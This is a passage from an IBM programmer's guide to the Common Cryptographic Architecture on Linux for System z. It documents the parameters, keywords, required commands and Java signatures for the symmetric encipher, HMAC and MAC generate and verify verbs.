clear +AES key is required. For rule_array keyword KEYIDENT, a 64-byte internal key-token or key label for +an internal key-token record inAES key-storage is required. +key_parms_length +Direction: Input Type: Integer +Apointer to an integer variable containing the number of bytes of data in the key_parms parameter. +This value must be 0. +key_parms +Direction: Input Type: String +Apointer to a string variable for key-related parameters. It is currently unused. +228 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Symmetric Algorithm Encipher (CSNBSAE) +block_size +Direction: Input Type: Integer +Apointer to an integer variable containing the block size used by the cryptographic algorithm. This +value must be 16. +initialization_vector_length +Direction: Input Type: Integer +Apointer to an integer variable containing the number of bytes of data in the initialization_vector +variable. For cipher block chaining with an INITIALICV selection, this value must be 16. For +processing rule ECB or ICV selection CONTINUE, this value should be 0. +initialization_vector +Direction: Input Type: String +Apointer to a string variable containing the initialization vector for the INITIALcall to CBC mode +encryption. It is not used if the process rule is ECB. The same initialization vector must be used when +deciphering the data. +chain_data_length +Direction: Input/Output Type: Integer +Apointer to an integer variable containing the number of bytes of data in the chain_data variable. On +input, this variable contains the length of the buffer provided and should have a value of 32 or greater +for CBC mode encryption, or 0 for ECB mode encryption. +On output, the variable is updated with the length of the data returned in the chain_data variable. The +chain_data_length parameter must not be changed by the calling application until chained operations +are complete. +chain_data +Direction: Input/Output Type: String +Apointer to a string variable used as a work area for CBC encipher requests. This work area is not +used for ECB mode encryption. When the verb performs a CBC encipher operation and the ICV +selection is INITIAL, the chain_data variable is an output-only buffer that receives data used as input +for enciphering the next part of the input data, if any. When the ICV selection is CONTINUE, the +chain_data variable is both an input and output buffer. The application must not change any +intermediate data in this string. +cleartext_length +Direction: Input Type: Integer +Apointer to an integer variable containing the number of bytes of data in the cleartext variable. This +length must be a multiple of the block_size variable unless processing rule PKCS-PAD is specified.A +value of zero is not permitted. +cleartext +Direction: Input Type: String +Apointer to a string variable used to contain the data to be enciphered, excluding any pad bytes. +ciphertext_length +Direction: Input/Output Type: Integer +On input, the ciphertext_length parameter is a pointer to an integer variable containing the number of +bytes of data in the ciphertext variable. On output, the ciphertext_length variable is updated to contain +the actual length of text output in the ciphertext variable. If PKCS-PAD is specified, the +ciphertext_length value must be greater than or equal to the next higher multiple of 16 as the +Chapter6.Protectingdata 229 + +Symmetric Algorithm Encipher (CSNBSAE) +cleartext_length value (from 1 - 16 bytes longer). Otherwise, the ciphertext_length value must be +greater than or equal to the cleartext_length variable. +ciphertext +Direction: Input/Output Type: String +Apointer to a string variable used as an output buffer where the verb returns the enciphered data. If +PKCS-PAD is specified, on output the ciphertext buffer contains 1 - 16 bytes of data more than the +cleartext input buffer contains. +optional_data_length +Direction: Input Type: Integer +Apointer to an integer variable containing the number of bytes of data in the optional_data variable. +This value should be 0. +optional_data +Direction: Input Type: String +Apointer to a string variable containing optional data for the encryption. It is currently not used. +Restrictions +None. +Required commands +This verb requires the SymmetricAlgorithm Encipher - secureAES keys command (offset X'012A') to be +enabled in the active role. +Usage notes +None +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBSAEJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBSAEJ are shown here. +230 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Symmetric Algorithm Encipher (CSNBSAE) +Format +public native void CSNBSAEJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +hikmNativeInteger rule_array_count, +byte[] rule_array, +hikmNativeInteger key_length, +byte[] key_identifier, +hikmNativeInteger key_parms_length, +byte[] key_parms, +hikmNativeInteger block_size, +hikmNativeInteger iv_length, +byte[] iv, +hikmNativeInteger chain_data_length, +byte[] chain_data, +hikmNativeInteger clear_text_length, +byte[] clear_text, +hikmNativeInteger cipher_text_length, +byte[] cipher_text, +hikmNativeInteger optional_data_length, +byte[] optional_data); +Chapter6.Protectingdata 231 + +Symmetric Algorithm Encipher (CSNBSAE) +232 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +Chapter 7. Verifying data integrity and authenticating +messages +CCAprovides the following methods to verify the integrity of transmitted messages and stored data: +v Message authentication code (MAC) +v Hash functions, including Modification Detection Code (MDC) processing and one-way hash generation +Note: You can also use digital signatures (see Chapter10, “Using digital signatures,” on page 359) to +authenticate messages. +The choice of verb depends on the security requirements of the environment in which you are operating. If +you need to ensure the authenticity of the sender as well as the integrity of the data and both the sender +and receiver can share a secret key, consider MessageAuthentication Code processing. If you need to +ensure the integrity of transmitted data in an environment where it is not possible for the sender and the +receiver to share a secret cryptographic key, consider hashing functions. +The verbs described in this chapter include: +| v “HMAC Generate (CSNBHMG)” on page 235 +| v “HMAC Verify (CSNBHMV)” on page 238 +v “MAC Generate (CSNBMGN)” on page 241 +v “MAC Verify (CSNBMVR)” on page 245 +v “MDC Generate (CSNBMDG)” on page 249 +v “One-Way Hash (CSNBOWH)” on page 258 +How MACs are used +When a message is sent, an application program can generate an authentication code for it using the +MAC Generate verb. CCAsupports theANSI X9.9-1 basic procedure and both theANSI X9.19 basic +procedure and optional double key MAC procedure. The MAC Generate verb computes the text of the +MessageAuthentication Code using the algorithm and a key. TheANSI X9.9-1 orANSI X9.19 basic +procedures accept either a single-length MAC generation (MAC) key or a data-encrypting (DATA) key, and +the message text. TheANSI X9.19 optional double key MAC procedure accepts a double-length MAC key +and the message text. The originator of the message sends the MAC with the message text. +When the receiver gets the message, an application program calls the MAC Verify verb. The MAC +Generate verb generates a MAC using the same algorithm as the sender and either the single-length or +double-length MAC verification key, the single-length or double-length MAC generation key, or DATAkey, +and the message text. The MAC Verify verb compares the MAC it generates with the one sent with the +message and issues a return code that indicates whether the MACs match. If the return code indicates +that the MACs match, the receiver can accept the message as genuine and unaltered. If the return code +indicates that the MACs do not match, the receiver can assume the message is either fraudulent or has +been altered. The newly computed MAC is not revealed outside the cryptographic coprocessor. +In a similar manner, MACs can be used to ensure the integrity of data stored on the system or on +removable media, such as tape. +Secure use of the MAC Generate and MAC Verify verbs requires the use of MAC and MACVER keys in +these verbs, respectively. To accomplish this, the originator of the message generates a MAC/MACVER +key pair, uses the MAC key in the MAC Generate verb, and exports the MACVER key to the receiver. The +originator of the message enforces key separation on the link by encrypting the MACVER key under a +transport key that is not an NOCV key before exporting the key to the receiver. With this type of key +separation enforced, the receiver can receive only a MACVER key and can use only this key in the MAC +©CopyrightIBMCorp.2007,2011 233 + +Verify verb. This ensures that the receiver cannot alter the message and produce a valid MAC with the +altered message. These security features are not present if DATAkeys are used in the MAC Generate +verb or if DATAor MAC keys are used in the MAC Verify verb. +By using MACs you get the following benefits: +v For data transmitted over a network, you can validate the authenticity of the message as well as +ensure the data has not been altered during transmission. For example, an active eavesdropper can tap +into a transmission line and interject fraudulent messages or alter sensitive data being transmitted. If the +data is accompanied by a MAC, the recipient can use a verb to detect whether the data has been +altered. Because both the sender and receiver share a secret key, the receiver can use a verb that +calculates a MAC on the received message and compares it to the MAC transmitted with the message. +If the comparison is equal, the message could be accepted as unaltered. Furthermore, because the +shared key is secret, when a MAC is verified it can be assumed that the sender was, in fact, the other +person who knew the secret key. +v For data stored on tape or DASD, you can ensure that the data read back onto the system was the +same as the data written onto the tape or DASD. For example, someone might be able to bypass +access controls. Such an access might escape the notice of auditors. However, if a MAC is stored with +the data, and verified when the data is read, you can detect alterations to the data. +How hashing functions and MDCs are used +Hashing functions include the MDC and one-way hash. You need to hash text before submitting it to the +Digital Signature Generate and Digital Signature Verify verbs (see Chapter10, “Using digital signatures,” +on page 359). CCAsupports the SHA-1, MD5, and RIPEMD-160 hashing functions. +When a message is sent, an application program can generate a hash or a Modification Detection Code +(MDC) for it using the One-Way Hash verb. This verb computes the hash or MDC, a short, fixed-length +value, using a one-way cryptographic function and the message text. The originator of the message +ensures the hash or MDC is transmitted with integrity to the intended receiver of the message. For +example, the value could be published in a reliable source of public information. +When the receiver gets the message, an application program calls the One-Way Hash verb to generate a +new hash or MDC using the same function and message text that were used by the sender. The +application program can compare the new value with the one generated by the originator of the message. +If the two values match, the receiver knows the message was not altered. +In a similar manner, hashes and MDCs can be used to ensure the integrity of data stored on the system or +on removable media, such as tape. +By using hashes and MDCs, you get the following benefits: +v For data transmitted over a network between locations that do not share a secret key, you can +ensure the data has not been altered during transmission. It is easy to compute a hash or MDC for +specific data, yet hard to find data that will result in a given hash or MDC. In effect, the problem of +ensuring the integrity of a large file is reduced to ensuring the integrity of a short, fixed-length value. +v For data stored on tape or DASD, you can ensure that the data read back onto the system was the +same as the data written onto the tape or DASD.After a hash has been established for a file, the +One-Way Hash verb can be run at any later time on the file. The resulting value can be compared with +the stored value to detect deliberate or inadvertent modification. +For more information, see “Modification Detection Code calculation” on page 493. +234 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +HMAC Generate (CSNBHMG) +HMAC Generate (CSNBHMG) +| +| Use the HMAC Generate verb to generate a keyed hash MessageAuthentication Code (HMAC) for the +| message string provided as input.An HMAC key that can be used for generate is required to calculate the +| HMAC. +Format +| +|| +CSNBHMG( +| return_code, +| reason_code, +| exit_data_length, +| exit_data, +| rule_array_count, +| rule_array, +| key_identifier_length, +| key_identifier, +| text_length, +| text, +| chaining_vector_length, +| chaining_vector, +| mac_length, +| mac ) +| +Parameters +| +| For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +| “Parameters common to all verbs” on page 14. +| rule_array_count +|| Direction: Input Type: Integer +| The number of keywords you supplied in the rule_array parameter. This value must be 2 or 3. +| rule_array +|| Direction: Input Type: String +| Keywords that provide control information to the verb. The following table lists the keywords. Each +| keyword is left-justified in 8-byte fields and padded on the right with blanks.All keywords must be in +| contiguous storage. The rule_array keywords are described in Table58. +|| Table58.KeywordsforHMACGeneratecontrolinformation +|| Keyword Description +| Tokenalgorithm(Onerequired) +|| HMAC SpecifiestheHMACalgorithmtobeusedtogeneratetheMAC. +| Hashmethod(Onerequired) +|| SHA-1 SpecifiestheFIPS-198HMACprocedureusingtheSHA-1hashmethod,asymmetrickeyandtextto +| producea20-byte(160-bit)MAC. +|| SHA-224 SpecifiestheFIPS-198HMACprocedureusingtheSHA-224hashmethod,asymmetrickeyandtextto +| producea28-byte(224-bit)MAC. +|| SHA-256 SpecifiestheFIPS-198HMACprocedureusingtheSHA-256hashmethod,asymmetrickeyandtextto +| producea32-byte(256-bit)MAC. +|| SHA-384 SpecifiestheFIPS-198HMACprocedureusingtheSHA-384hashmethod,asymmetrickeyandtextto +| producea48-byte(384-bit)MAC. +|| SHA-512 SpecifiestheFIPS-198HMACprocedureusingtheSHA-512hashmethod,asymmetrickeyandtextto +| producea64-byte(512-bit)MAC. +Chapter7.Verifyingdataintegrityandauthenticatingmessages 235 + +HMAC Generate (CSNBHMG) +| Table58.KeywordsforHMACGeneratecontrolinformation (continued) +|| Keyword Description +| Segmentingcontrol(Oneoptional) +|| FIRST Firstcall,thisisthefirstsegmentofdatafromtheapplicationprogram. +|| LAST Lastcall;thisisthelastdatasegment. +|| MIDDLE Middlecall;thisisanintermediatedatasegment. +|| ONLY Onlycall;segmentingisnotemployedbytheapplicationprogram.Thisisthedefaultvalue. +| +| key_identifier_length +|| Direction: Input Type: Integer +| The length of the key_identifier parameter. The maximum value is 725. +| key_identifier +|| Direction: Input Type: String +| The 64-byte label or internal token of an encrypted HMAC key. +| text_length +|| Direction: Input Type: Integer +| The length of the text you supply in the text parameter. The maximum length of text is 214783647 +| bytes. For FIRST and MIDDLE calls, the text_length must be a multiple of 64 for SHA-1, SHA-224 and +| SHA-256 and a multiple of 128 for SHA-384 and SHA-512 hash methods. +| text +|| Direction: Input Type: String +| The application-supplied text for which the MAC is generated. +| chaining_vector_length +|| Direction: Input/Output Type: Integer +| The length of the chaining_vector in bytes. This value must be 128. +| chaining_vector +|| Direction: Input/Output Type: String +| An 128-byte string used as a system work area. Your application program must not change the data in +| this string. The chaining vector permits data to be chained from one invocation call to another. +| On the first call, initialize this parameter as binary zeros. +| mac_length +|| Direction: Input/Output Type: Integer +| The length of the mac parameter in bytes. This parameter is updated to the actual length of the mac +| parameter on output. The minimum value is 4, and the maximum value is 64. +| mac +|| Direction: Output Type: String +| The field in which the verb returns the MAC value if the segmenting rule is ONLY or LAST. +Restrictions +| +| This verb was introduced with CCA4.1.0. +236 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +HMAC Generate (CSNBHMG) +Required commands +| +| This verb requires the commands shown in the following table to be enabled in the active role: +|||| +Rule-arraykeyword Offset Command +||| SHA-1 X'00E4' HMACGenerate-SHA-1 +||| SHA-224 X'00E5' HMACGenerate-SHA-224 +||| SHA-256 X'00E6' HMACGenerate-SHA-256 +||| SHA-384 X'00E7' HMACGenerate-SHA-384 +||| SHA-512 X'00E8' HMACGenerate-SHA-512 +| +Usage notes +| +| None +Related information +| +| The HMAC Verify verb is described in “HMAC Verify (CSNBHMV)” on page 238. +JNI version +| +| This verb has a Java Native Interface (JNI) version, which is named CSNBHMGJ. See “Building Java +| applications to use with the CCAJNI” on page 16. +| The parameters for CSNBHMGJ are shown here. +| +| Format +| public native void CSNBHMGJ( +| hikmNativeInteger return_code, +| hikmNativeInteger reason_code, +| hikmNativeInteger exit_data_length, +| byte[] exit_data, +| hikmNativeInteger rule_array_count, +| byte[] rule_array, +| hikmNativeInteger key_identifier_length +| byte[] key_identifier, +| hikmNativeInteger text_length, +| byte[] text, +| hikmNativeInteger chaining_vector_length, +| byte[] chaining_vector, +| hikmNativeInteger mac_length, +|| byte[] MAC); +| +| +| +Chapter7.Verifyingdataintegrityandauthenticatingmessages 237 + +HMAC Verify (CSNBHMV) +HMAC Verify (CSNBHMV) +| +| Use the HMAC Verify verb to verify a keyed hash MessageAuthentication Code (HMAC) for the message +| string provided as input.AMAC key contained in an internal variable-length symmetric key-token is +| required to verify the HMAC. The key must have the same value as the key used to generate the HMAC. +Format +| +|| +CSNBHMV( +| return_code, +| reason_code, +| exit_data_length, +| exit_data, +| rule_array_count, +| rule_array, +| key_identifier_length, +| key_identifier, +| text_length, +| text, +| chaining_vector_length, +| chaining_vector, +| mac_length, +| mac ) +| +Parameters +| +| For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +| “Parameters common to all verbs” on page 14. +| rule_array_count +|| Direction: Input Type: Integer +| The number of keywords you supplied in the rule_array parameter. This value must be 2 or 3. +| rule_array +|| Direction: Input Type: String +| Keywords that provide control information to the verb. The following table lists the keywords. Each +| keyword is left-justified in 8-byte fields and padded on the right with blanks.All keywords must be in +| contiguous storage. The rule_array keywords are described in Table59. +|| Table59.KeywordsforHMACVerifycontrolinformation +|| Keyword Description +| Tokenalgorithm(Onerequired) +|| HMAC SpecifiestheHMACalgorithmtobeusedtoverifytheMAC. +| Hashmethod(Onerequired) +|| SHA-1 SpecifiestheFIPS-198HMACprocedureusingtheSHA-1hashmethod,asymmetrickeyandtextto +| producea20-byte(160-bit)MAC. +|| SHA-224 SpecifiestheFIPS-198HMACprocedureusingtheSHA-224hashmethod,asymmetrickeyandtextto +| producea28-byte(224-bit)MAC. +|| SHA-256 SpecifiestheFIPS-198HMACprocedureusingtheSHA-256hashmethod,asymmetrickeyandtextto +| producea32-byte(256-bit)MAC. +|| SHA-384 SpecifiestheFIPS-198HMACprocedureusingtheSHA-384hashmethod,asymmetrickeyandtextto +| producea48-byte(384-bit)MAC. +|| SHA-512 SpecifiestheFIPS-198HMACprocedureusingtheSHA-512hashmethod,asymmetrickeyandtextto +| producea64-byte(512-bit)MAC. +238 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +HMAC Verify (CSNBHMV) +| Table59.KeywordsforHMACVerifycontrolinformation (continued) +|| Keyword Description +| Segmentingcontrol(Optional) +|| FIRST Firstcall,thisisthefirstsegmentofdatafromtheapplicationprogram. +|| LAST Lastcall;thisisthelastdatasegment. +|| MIDDLE Middlecall;thisisanintermediatedatasegment. +|| ONLY Onlycall;segmentingisnotemployedbytheapplicationprogram.Thisisthedefaultvalue. +| +| key_identifier_length +|| Direction: Input Type: Integer +| The length of the key_identifier parameter. The maximum value is 725. +| key_identifier +|| Direction: Input/Output Type: String +| The 64-byte label or internal token of an encrypted HMAC or HMACVER key. +| text_length +|| Direction: Input Type: Integer +| The length of the text you supply in the text parameter. The maximum length of text is 214783647 +| bytes. For FIRST and MIDDLE calls, the text_length must be a multiple of 64 for SHA-1, SHA-224 and +| SHA-256 and a multiple of 128 for SHA-384 and SHA-512 hash methods. +| text +|| Direction: Input Type: String +| The application-supplied text for which the HMAC is to be verified. +| chaining_vector_length +|| Direction: Input/Output Type: Integer +| The length of the chaining_vector in bytes. This value must be 128. +| chaining_vector +|| Direction: Input/Output Type: String +| An 128-byte string used as a system work area. Your application program must not change the data in +| this string. The chaining vector permits data to be chained from one invocation call to another. +| On the first call, initialize this parameter as binary zeros. +| mac_length +|| Direction: Input Type: Integer +| The length of the mac parameter in bytes. The maximum value is 64. +| mac +|| Direction: Input Type: String +| The field that contains the MAC value you want to verify. +Restrictions +| +| This verb was introduced with CCA4.1.0. +Chapter7.Verifyingdataintegrityandauthenticatingmessages 239 + +HMAC Verify (CSNBHMV) +Required commands +| +| This verb requires the commands shown in the following table to be enabled in the active role: +|||| +Rule-arraykeyword Offset Command +||| SHA-1 X'00F7' HMACVerify-SHA-1 +||| SHA-224 X'00F8' HMACVerify-SHA-224 +||| SHA-256 X'00F9' HMACVerify-SHA-256 +||| SHA-384 X'00FA' HMACVerify-SHA-384 +||| SHA-512 X'00FB' HMACVerify-SHA-512 +| +Usage notes +| +| None +Related information +| +| The HMAC Generate verb is described in “HMAC Generate (CSNBHMG)” on page 235. +JNI version +| +| This verb has a Java Native Interface (JNI) version, which is named CSNBHMVJ. See “Building Java +| applications to use with the CCAJNI” on page 16. +| The parameters for CSNBHMVJ are shown here. +| +| Format +| public native void CSNBHMVJ( +| hikmNativeInteger return_code, +| hikmNativeInteger reason_code, +| hikmNativeInteger exit_data_length, +| byte[] exit_data, +| hikmNativeInteger rule_array_count, +| byte[] rule_array, +| hikmNativeInteger key_identifier_length +| byte[] key_identifier, +| hikmNativeInteger text_length, +| byte[] text, +| hikmNativeInteger chaining_vector_length, +| byte[] chaining_vector, +| hikmNativeInteger mac_length, +|| byte[] MAC); +| +| +| +240 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +MAC Generate (CSNBMGN) +MAC Generate (CSNBMGN) +When a message is sent, an application program can generate an authentication code for it using the +MAC Generate verb. This verb to generates a 4-byte, 6-byte, or 8-byte MessageAuthentication Code +(MAC) for an application-supplied text string. +This verb computes the MessageAuthentication Code using one of the following methods: +v Using theANSI X9.9-1 single key algorithm, a single-length MAC generation key or data-encrypting key, +and the message text. +v Using theANSI X9.19 optional double key algorithm, a double-length MAC generation key and the +message text. +v Using the Europay, MasterCard and Visa (EMV) padding rules. +The MAC can be the leftmost 32 or 48 bits of the last block of the ciphertext or the entire last block (64 +bits) of the ciphertext. The originator of the message sends the MessageAuthentication Code with the +message text. +Host CPU acceleration: CPACF +Only keys with a key type of DATAcan be used successfully with the CPACF exploitation layer through +this verb. Specifically, a DATAkey has a CV (Control Vector) of all X'00' bytes for all active bytes of the CV +(eight bytes for 8-byte DES keys, 16 bytes for 16-byte DES keys, and 16 bytes for 24-byte DES keys). +For details about CPACF, see “CPACF support” on page 8. +Format +CSNBMGN( +return_code, +reason_code, +exit_data_length, +exit_data, +key_identifier, +text_length, +text, +rule_array_count, +rule_array, +chaining_vector, +mac ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +key_identifier +Direction: Input/Output Type: String +The 64-byte key label or internal key token that identifies a single-length or double-length MAC +generate key or a single-length DATAor DATAM key. The type of key depends on the MAC process +rule in the rule_array parameter. +text_length +Direction: Input Type: Integer +The length of the text you supply in the text parameter. If the text_length is not a multiple of eight +bytes and if the ONLY or LAST keyword of the rule_array parameter is called, the text is padded in +accordance with the processing rule specified. +Chapter7.Verifyingdataintegrityandauthenticatingmessages 241 + +MAC Generate (CSNBMGN) +text +Direction: Input Type: String +The application-supplied text for which the MAC is generated. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 0, 1, 2, or 3. +rule_array +Direction: Input Type: String +Zero to three keywords that provide control information to the verb. The keywords are described in +Table60. The keywords must be in 24 bytes of contiguous storage with each of the keywords +left-justified in its own 8-byte location and padded on the right with blanks. For example, +’X9.9-1 MIDDLE MACLEN4 ’ +The order of the rule_array keywords is not fixed. +You can specify one of the MAC processing rules and then choose one of the segmenting control +keywords and one of the MAC length keywords. The rule_array keywords are described in Table60. +Table60.KeywordsforMACGeneratecontrolinformation +Keyword Description +| MACprocessrules(One,optional) +EMVMAC EMVpaddingrulewithasingle-lengthMACkey.Thekey_identifierparametermustidentifya +single-lengthMACorasingle-lengthDATAkey.Thetextisalwayspaddedwith1-8bytessothe +resultingtextlengthisamultipleofeightbytes.ThefirstpadcharacterisX'80'.Theremainingpad +charactersareX'00'. +EMVMACD EMVpaddingrulewithadouble-lengthMACkey.Thekey_identifierparametermustidentifya +double-lengthMACkey.ThepaddingrulesarethesameasforEMVMAC. +TDES- ANSIX9.9-1procedureusingISO16609CBCmodetriple-DES(TDES)encryptionofthedata.Usesa +MAC double-lengthkey. +X9.19OPT ANSIX9.19optionaldoublekeyMACprocedure.Thekey_identifierparametermustidentifya +double-lengthMACkey.ThepaddingrulesarethesameasforX9.9-1. +X9.9-1 ANSIX9.9-1andX9.19basicprocedure.Thekey_identifierparametermustidentifyasingle-length +MACorasingle-lengthDATAkey.X9.9-1causestheMACtobecomputedfromallofthedata.Thetext +ispaddedonlyifthetextlengthisnotamultipleofeightbytes.Ifpaddingisrequired,thepadcharacter +X'00'isused.Thisisthedefaultvalue. +| Segmentingcontrol(One,optional) +FIRST Firstcall;thisisthefirstsegmentofdatafromtheapplicationprogram. +LAST Lastcall;thisisthelastdatasegment. +MIDDLE Middlecall;thisisanintermediatedatasegment. +ONLY Onlycall;segmentingisnotemployedbytheapplicationprogram.Thisisthedefaultvalue. +| MAClengthandpresentation(One,optional) +HEX-8 Generatesa4-byteMACvalueandpresentsitas8hexadecimalcharacters. +HEX-9 Generatesa4-byteMACvalueandpresentsitastwogroupsof4hexadecimalcharacterswithaspace +betweenthegroups. +MACLEN4 Generatesa4-byteMACvalue.Thisisthedefaultvalue. +MACLEN6 Generatesa6-byteMACvalue. +242 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +MAC Generate (CSNBMGN) +Table60.KeywordsforMACGeneratecontrolinformation (continued) +Keyword Description +MACLEN8 Generatesan8-byteMACvalue. +chaining_vector +Direction: Input/Output Type: String +An 18-byte string that CCAuses as a system work area. Your application program must not change +the data in this string. The chaining vector permits data to be chained from one invocation call to +another. +On the first call, initialize this parameter as binary zeros. +mac +Direction: Output Type: String +The 8-byte or 9-byte field in which the verb returns the MAC value if the segmenting rule is ONLY or +LAST.Allocate an 8-byte field for MAC values of four bytes, six bytes, eight bytes, or HEX-8.Allocate +a 9-byte MAC field if you specify HEX-9 in the rule_array parameter. +Restrictions +It might seem intuitive that a DATAM key should also be usable for the MAC Generate verb, and a +DATAMV key for the MAC Verify verb, with the CPACF exploitation layer. However, this would violate the +security restrictions imposed by the user when the user creates a key of type DATAM or DATAMV.ADES +key that has been translated for use with the CPACF (see “CPACF support” on page 8) can be used with +CPACF DES encrypt and decrypt operations, an operation that is by definition not allowed for a DATAM or +DATAMV key type.Also note that by definition both through z/OS CCA-ICSF and in this S390 Linux CCA +access layer, a DATAkey of 16 bytes or 24 bytes in length is restricted from use with the X9.19OPT and +EMVMACD rule_array keyword specified MAC algorithms. The only available MAC algorithm for a 16-byte +or 24-byte DATAkey is the TDES-MAC algorithm. +Also note that the CPACF exploitation layer is activated only for MAC Generate or MAC Verify calls that +specify the ONLY rule_array keyword for segmenting control (this is the default segmenting control if no +segmenting control rule_array keyword is specified). The reason for this is that the intermediate MAC +context for normal CEX3C calls to MAC Generate and MAC Verify is protected by the adapter Master Key. +Because the same security cannot be provided for intermediate results from the host-based CPACF +exploitation layer (they are returned in the clear by the CPACF) the FIRST, MIDDLE, and LAST +segmenting control keywords will direct operations to the CEX3C. +Required commands +| This verb requires the MAC Generate command (offset X'0010') to be enabled in the active role. +Usage notes +None +Related information +The MAC Verify verb is described in “MAC Verify (CSNBMVR)” on page 245. +JNI version +This verb has a Java Native Interface (JNI) version, which is named CSNBMGNJ. See “Building Java +applications to use with the CCAJNI” on page 16. +The parameters for CSNBMGNJ are shown here. +Chapter7.Verifyingdataintegrityandauthenticatingmessages 243 + +MAC Generate (CSNBMGN) +Format +public native void CSNBMGNJ( +hikmNativeInteger return_code, +hikmNativeInteger reason_code, +hikmNativeInteger exit_data_length, +byte[] exit_data, +byte[] key_identifier, +hikmNativeInteger text_length, +byte[] text, +hikmNativeInteger rule_array_count, +byte[] rule_array, +byte[] chaining_vector, +byte[] MAC); +244 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +MAC Verify (CSNBMVR) +MAC Verify (CSNBMVR) +When the receiver gets a message, an application program calls the MAC Verify verb. This verb verifies a +4-byte, 6-byte, or 8-byte MessageAuthentication Code (MAC) for an application-supplied text string. This +verb verifies a MAC by generating another MAC and comparing it with the MAC received with the +message. This process takes place entirely within the secure module on the coprocessor. If the two codes +are the same, the message sent was the same one received.Areturn code indicates whether the MACs +are the same. The generated MAC never appears in storage and is not revealed outside the cryptographic +feature. +The MAC Verify verb can use any of the following methods to generate the MAC for authentication: +v TheANSI X9.9-1 single key algorithm, a single-length MAC verification or MAC generation key (or a +data-encrypting key), and the message text. +v TheANSI X9.19 optional double key algorithm, a double-length MAC verification or MAC generation key +and the message text. +v Using the Europay, MasterCard and Visa (EMV) padding rules. +The method used to verify the MAC should correspond with the method used to generate the MAC. +Host CPU acceleration: CPACF +For details about CPACF, see “CPACF support” on page 8. +Only keys with a key type of DATAcan be used successfully with the CPACF exploitation layer through +this verb. Specifically, a DATAkey has a CV (Control Vector) of all X'00' bytes for all active bytes of the CV +(eight bytes for 8-byte DES keys, 16 bytes for 16-byte DES keys, and 16 bytes for 24-byte DES keys). +Format +CSNBMVR( +return_code, +reason_code, +exit_data_length, +exit_data, +key_identifier, +text_length, +text, +rule_array_count, +rule_array, +chaining_vector, +mac ) +Parameters +For the definitions of the return_code, reason_code, exit_data_length, and exit_data parameters, see +“Parameters common to all verbs” on page 14. +key_identifier +Direction: Input/Output Type: String +The 64-byte key label or internal key token that identifies a single-length or double-length MAC verify +key, a single-length or double-length MAC generation key, or a single-length DATAkey. The type of +key depends on the MAC process rule in the rule_array parameter. +text_length +Direction: Input Type: Integer +Chapter7.Verifyingdataintegrityandauthenticatingmessages 245 + +MAC Verify (CSNBMVR) +The length of the clear text you supply in the text parameter. If the text_length parameter is not a +multiple of eight bytes and if the ONLY or LAST keyword of the rule_array parameter is called, the text +is padded in accordance with the processing rule specified. +text +Direction: Input Type: String +The application-supplied text for which the MAC is verified. +rule_array_count +Direction: Input Type: Integer +Apointer to an integer variable containing the number of elements in the rule_array variable. This +value must be 0, 1, 2, or 3. +rule_array +Direction: Input Type: String +Zero to three keywords that provide control information to the verb. The keywords are described in +Table61. The keywords must be in 24 bytes of contiguous storage with each of the keywords +left-justified in its own 8-byte location and padded on the right with blanks. For example, +’X9.9-1 MIDDLE MACLEN4 ’ +The order of the rule_array keywords is not fixed. +You can specify one of the MAC processing rules, and then choose one of the segmenting control +keywords and one of the MAC length keywords. The rule_array keywords are described in Table61. +Table61.KeywordsforMACVerifycontrolinformation +Keyword Description +| MACprocessrules(One,optional) +EMVMAC EMVpaddingrulewithasingle-lengthMACkey.Thekey_identifierparametermustidentifya +single-lengthMAC,MACVER,orDATAkey.Thetextisalwayspaddedwith1-8bytes,sothatthe +resultingtextlengthisamultipleofeightbytes.ThefirstpadcharacterisX'80'.Theremainingpad +charactersareX'00'. +EMVMACD EMVpaddingrulewithadouble-lengthMACkey.Thekey_identifierparametermustidentifya +double-lengthMACorMACVERkey.ThepaddingrulesarethesameasforEMVMAC. +TDES- ANSIX9.9-1procedureusingISO16609CBCmodetriple-DES(TDES)encryptionofthedata.Usesa +MAC double-lengthkey. +X9.9-1 ANSIX9.9-1andX9.19basicprocedure.Thekey_identifierparametermustidentifyasingle-length +MAC,MACVER,orDATAkey.X9.9-1causestheMACtobecomputedfromallthedata.Thetextis +paddedonlyifthetextlengthisnotamultipleofeightbytes.Ifpaddingisrequired,thepadcharacter +X'00'isused.Thisisthedefaultvalue. +X9.19OPT ANSIX9.19optionaldouble-lengthMACprocedure.Thekey_identifierparametermustidentifya +double-lengthMACorMACVERkey.ThepaddingrulesarethesameasforX9.9-1. +| Segmentingcontrol(Optional) +FIRST Firstcall;thisisthefirstsegmentofdatafromtheapplicationprogram. +LAST Lastcall;thisisthelastdatasegment. +MIDDLE Middlecall;thisisanintermediatedatasegment. +ONLY Onlycall;theapplicationprogramdoesnotemploysegmenting.Thisisthedefaultvalue. +| MAClengthandpresentation(Optional) +HEX-8 Verifiesa4-byteMACvaluerepresentedas8hexadecimalcharacters. +246 LinuxforSystemz: SecureKeySolutionwiththeCommonCryptographicArchitectureApplicationProgrammer'sGuide + +MAC Verify (CSNBMVR) +Table61.KeywordsforMACVerifycontrolinformation (continued) +Keyword Description +HEX-9 